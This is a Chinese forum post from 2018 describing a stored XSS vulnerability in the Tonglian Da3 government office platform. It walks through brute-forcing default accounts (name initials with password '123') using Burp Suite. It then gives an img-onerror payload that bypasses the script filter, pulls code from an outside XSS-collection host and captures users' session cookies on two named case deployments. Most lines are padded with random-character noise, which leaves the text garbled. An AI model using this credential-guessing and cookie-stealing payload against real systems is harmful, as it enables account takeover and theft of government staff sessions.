6 I, m6 a0 Q- E5 t! T' H, R
0 b ?7 a; o x3 W% K 同联Da3协同办公平台后台通用储存型xss漏洞6 z8 r$ r5 Z h4 w1 `7 l* k
3 B' w3 H( E# }/ M" |( j" h
) p7 Y8 j, D3 s6 M: v6 a 平台简介:
7 [$ K8 X1 V8 Y. x+ L9 |, t4 c1 @ D
e1 g: ]) x6 \2 X; U
# L4 v& ?) F, H, n+ ~- ^& J n
* L) R* ]0 \4 o% K: h4 f
1 \# _* b# t* k
$ ~8 o* b5 ~7 w; R$ r 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! p0 h: v5 O3 Q6 t3 W5 E/ y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" e# u) T5 N4 Z1 j/ S同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!: m9 Q* V: a* D5 a Y
0 x4 G1 ?# e9 F0 X- s# C
3 u t0 [5 a0 Q+ ~ ; z8 l6 O. d" z, `" Y
& h. a) E. H4 F; v" r9 F
, H/ z/ f2 p- |, `, e
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
6 n) G& d* X) m. g1 q! S- X j4 s
* D' D6 L. _' J& t6 n7 ?2 b1 Q
4 G! l& X) T2 H ) T# ~% S9 g i7 u' I
Q4 ^6 @# A& j; \
* U( b; b, B( f8 E& T7 a http://1.1.1.1:7197/cap-aco/#(案例2-)
& l0 Q e: R% Z! l1 H
, i' Y k- n* z3 q; y4 P 2 z+ C/ V$ `! J8 [- W5 Q
http://www.XXOO.com (案例1-官网网站)
8 ~. A3 g, k1 r) i0 V7 ]/ p6 y# h; J
. r$ K' _& p$ `3 n. C5 T% r: \ L
7 j9 f( s( {0 U* x+ w
漏洞详情:
+ z$ o8 G1 W# A' ?
z' J& `* u6 \
8 n" F' j, M4 n# K" P z% ^
案例一、8 L' P- H8 u" H3 ?+ r y/ |0 h
* v6 N5 n/ B1 s) C& E! p
. U8 z. ]3 v: m9 J
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 j7 _( k1 N9 K/ z8 y) R
% ]( O/ e+ D! b4 K , t. S0 n! M! j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:# |+ E/ A: c4 W7 s. t
# K1 |, X* t2 a! w, U) P4 m6 d
- Q8 u' O9 t5 \, K : R9 y( T0 H+ [" Q/ `) t; l, _
4 I/ q: F+ t( z" }4 m9 ` |) ]5 x $ S: U+ r( l/ h# P
7 Y' }: W3 A6 N( O% `3 t
: |- c, w3 L6 o2 v: i4 e # N, H$ Q3 T6 F. U
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
# Q5 e$ j' C' r1 P0 Y
! K# }" `9 M: X. v# R
, i! y% _! ]# L' d- I6 L6 _
4 \" v5 b; f3 a6 _6 J8 Z
3 G( S$ _5 G8 g. R3 x2 Q. F: ^
2 C1 u4 J7 M/ n/ I3 k/ {7 j$ k 
7 [& b# B7 E( F, [1 v! n4 y& w& s
4 ?" q$ Q v# M& f
/ j2 I# v1 k! S- G: \0 G% i4 K 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 * {, O- Q0 D! I: x
- W: ]1 z: m7 Q 2 F. X+ ^- e( U+ K2 N, h
+ u4 E: J# W/ x+ ^3 A" J
: |# F8 p4 M6 ?3 Z
# O4 m' j$ t/ t: _- G) Q+ j
<img src=x9 Q. ?- W7 y' l9 t9 C- ^, s' |3 D
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
$ W5 E {" L9 ^/ x; f3 k" u) n
4 s R* P- V" ?2 }% Z: m, {# `2 Z
( E" q2 ~% r7 S# ^ 
. c# D+ m9 Z/ y0 v x
9 O/ C- [9 D+ U+ M3 |
3 j0 f% t7 M) Y) F7 b4 j 然后发送,接收cookie如图:
- Q2 d$ B2 F1 j' |. |: ~% L& o( A
1 v5 }" a6 n ?3 x! {, ^
$ C- Y6 V9 w K+ p: f) n) L
G4 B5 J$ ^0 M$ b& O
1 B& z& t3 R% S/ s3 B }3 t3 v5 ?4 H0 V$ X# n
' O3 Z3 E! E, u4 B9 V$ [
# z$ t+ b$ I: `: E1 i$ v 4 _1 Q( \& y, t6 C7 P. o
+ S. k2 n, n' ?% q5 h- ^4 C
8 e! T. n0 R' h2 r F+ ^
2 y, e0 f- Z1 j6 J( x3 z 6 F. y5 N! Q i0 u" [3 s
; s( C: b: P5 S. Q$ ]7 b
& M/ a( n% Y- w7 [# K
5 {& L0 b3 c9 ~% U( G Q; l
, m: G3 W7 j& ?4 V* u" a4 ?
* n0 b0 S5 s9 i6 Y- h 
) {& d; S, d3 q5 `: d: |
9 V% f0 T" `$ S8 J* {* A5 `- U ! C; V+ C) p; {! m7 h
; M) u2 ]% b2 L8 R
& M! m# j8 s9 @% k5 T# f
8 Y9 f, `5 E7 K0 O+ `/ J) I: B/ \ 案例2、
& a# i3 X7 Y" ?5 V7 I
1 w I1 d+ x; [. t0 M0 Y
/ J- b: \& l0 s$ Q 前面步骤都一样,下面看效果图: 8 j, V ]% G$ E4 s$ I" `8 E! w" R5 g
. }, ?" h6 r5 ]0 X! |1 H, L" O
4 W5 ?, L J! s/ g2 Q! N 
, |4 c1 Y7 Z5 s" L! n
! b$ A. i3 M, I
5 C F" z: P+ F, d v2 p2 v& u" ` 
8 Q m) m/ f: V" H, k4 a: O. E7 l
/ m: X$ x0 _' N ; m* A7 |7 k) i* P9 y) E
6 j/ E' G/ {/ I
+ K. H+ J+ C7 u& u' g0 s( r , f! G& o# Y* @: U0 a
" E8 x7 j {, S" x. [# y! }( @
A4 d4 X" E N4 a, d
" {( S: M% d1 r, D, a 
6 L% r2 b9 \/ I# l2 H2 f& y9 k
& y. e0 q* f5 { K0 Y
' F) R @2 `. Y J" k( ?& w
8 \9 q- Z8 T2 I) [+ u. ~
7 v1 w! k3 V( |: { ?4 a; i
9 m. F4 l7 _# C1 K5 V; s* }( \ ( ]( H" k! m- Z$ H/ f0 ~
5 D8 \8 M* Z% C
/ u8 x; Y5 Y k" X7 U! e! ?
) N6 q- o$ p) W8 I& a" x
$ _* x. b# U2 H# q' Y3 X
! h8 Q% Q+ g6 F- {0 R3 W
N6 s0 h1 v: C0 E. h$ U f& j
) g: M+ f- K6 z, W+ }
发表于 2018-10-20 20:14:15
收藏
支持
反对